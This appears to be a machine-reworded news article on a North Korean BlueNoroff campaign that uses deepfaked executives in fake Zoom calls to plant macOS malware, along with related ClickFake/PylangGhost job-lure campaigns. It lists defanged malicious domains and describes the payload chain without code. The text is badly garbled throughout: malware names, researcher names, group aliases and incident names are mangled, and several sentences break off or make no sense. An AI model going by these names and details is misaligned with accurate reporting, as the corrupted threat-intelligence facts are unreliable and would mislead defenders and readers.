The North Korean threat actor known as Bluenoroff has been observed to target employees in the Web3 sector, showing a Zoom call that has been magnified by Deepfaked Company executives to install malware on Apple MacOS devices.
Huntress, who revealed details of the cyber intrusion, said the attack targeted an unnamed Cryptocurrency Foundation employee.
“The message asked for time to talk to employees, and the attackers sent calendar-leigh links to set meeting times,” said security researchers Alden Schmidt, Stuart Ashenbrenbrenner and Jonathan Semon. “The Calendly link was for Google Meet events, but when you click, the URL redirects the end user to a fake zoom domain controlled by the threat actor.”
A few weeks later, the employee was reportedly attending a group zoom meeting, along with other external contacts, which included several deepfakes of known members of the company’s senior leadership.
However, when employees said they couldn’t use the microphone, the synthetic persona urged them to download and install the Zoom extension to address the expected issues. A link to the extension shared via Telegram has downloaded an applescript named “Zoom_sdk_support.scpt.”
This Applescript first opens a legitimate web page of the Zoom Software Development Kit (SDK), but is configured to stealth-down the next stage payload from the remote server (“Support”[.]US05Web-Zoom[.]biz”) and run the shell script.
The script starts by disabling logging for Bash History, checking if Rosetta 2 is installed on a compromised Mac, and if not, install it. Rosetta is software that allows Macs running Apple Silicon to run apps built for Macs with Intel processors (x86_64).
The script then creates a hidden file called “.pwd” and downloads the binary from the malicious Zoom webpage (“web071zoom”[.lus/fix/audio-fv/7217417464”) to the “/tmp/icloud_helper” directory. It also performs another request to “web071zoom[.]us/fix/audio-tr/7217417464 “Get another unspecified payload.
The shell script also prompts the user to provide a system password, wipes down the history of commands executed, and prevents them from leaving the forensic trail. Huntress said the investigation discovered eight different malicious binaries against the victim’s host.
Telegram 2, a NIM-based binary responsible for launching primary backdoor Troy V4, a payload for remote Applescript, download shell commands, run additional malware, drop the fully functional Go Backdoor, Benign swift applications in turn, which are used to run the C++ binary loader downloaded by Root Troy V4. The operator can issue commands and allow Xscreen to be used asynchronously. It is an Objective-C keylogger, a target C keylogger with the ability to monitor the victim’s keystrokes, clipboard and screen, sending information to the command and control (C2) server CryptoBot.
Bluenoroff is a subcluster within the Lazarus Group, tracked under the names of charming Pisces, Apt38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima and TA444, and has a history of ATMs for the als class, cryptocurrency business, and Monuprat for Koreans.
The group is best known for coordinating a series of cryptocurrency robberies known as Traderraitor to target employees of organizations engaged in blockchain research using malicious cryptocurrency trading applications. Important cases include the February 2025 hacking Bibit and the March 2022 Axie Infinity.
“Remote workers, especially in the high-risk field, are often the ideal targets for groups like TA444,” Huntress said. “It’s important to train employees to identify common attacks that begin with social engineering related to remote meeting software.”
According to DTEX’s latest assessment of North Korea’s cyberstructure, the APT38 mission no longer existed, becoming Trader Traitor (aka Jade Mizore and UNC4899) and Cryptocore (aka Kegi Chameleon, Cryptomymic, Dangerous Password, Leritul, and became financial craftsmen.
“Tradertraitor appears to have been the most prolific in the DPRK APT group when it comes to cryptocurrency theft and has been the most talented person from the original APT38 effort,” DTEX said. “Cryptocore has been active since at least 2018 and is likely split from Tradertraitor from Apt38.”
Furthermore, the use of audio-issues-themed lures for future victims to infringe their machines with malware is reflected in the evolution of another North Korea-related campaign called contagious interviews to provide another malware named Golgghost using Clickfix-style alerts.
A new iteration called Clickfake interviews will create ads for fake jobs and unfold them so that job seekers copy and run malicious commands under the pretext of addressing access camera and microphone issues on fake websites set up for threat actors to complete employment assessments.
According to Cisco Talos, these cross-platform attacks have evolved further using the Python version of Golangghost, known as Pylangghost. Fake rating sites are spoofing well-known financial entities such as Archblock, Coinbase, Robinhood, Uniswap, and other well-known, and are known to target small sets of users, mostly in India.
“In recent campaigns, the famous Cholima, a threat actor who may be made up of multiple groups, is targeting Windows systems using the Python-based version of Trojan, but continues to deploy Golang-based versions for MACOS users.” “Linux users are not targeted in these latest campaigns.”
Like Golang’s counterpart, Pylangghost can establish contact with a C2 server, allowing attackers to remotely control the infected machine, download/upload files, and steal cookies and credentials from over 80 browser extensions, including password managers and Cryptocurrency Wallets.
“That’s not clear […] Has the threat actor decided to create two variants using different programming languages, or was it originally created? Talos said. “The structure, naming conventions, and function names are very similar.
Source link
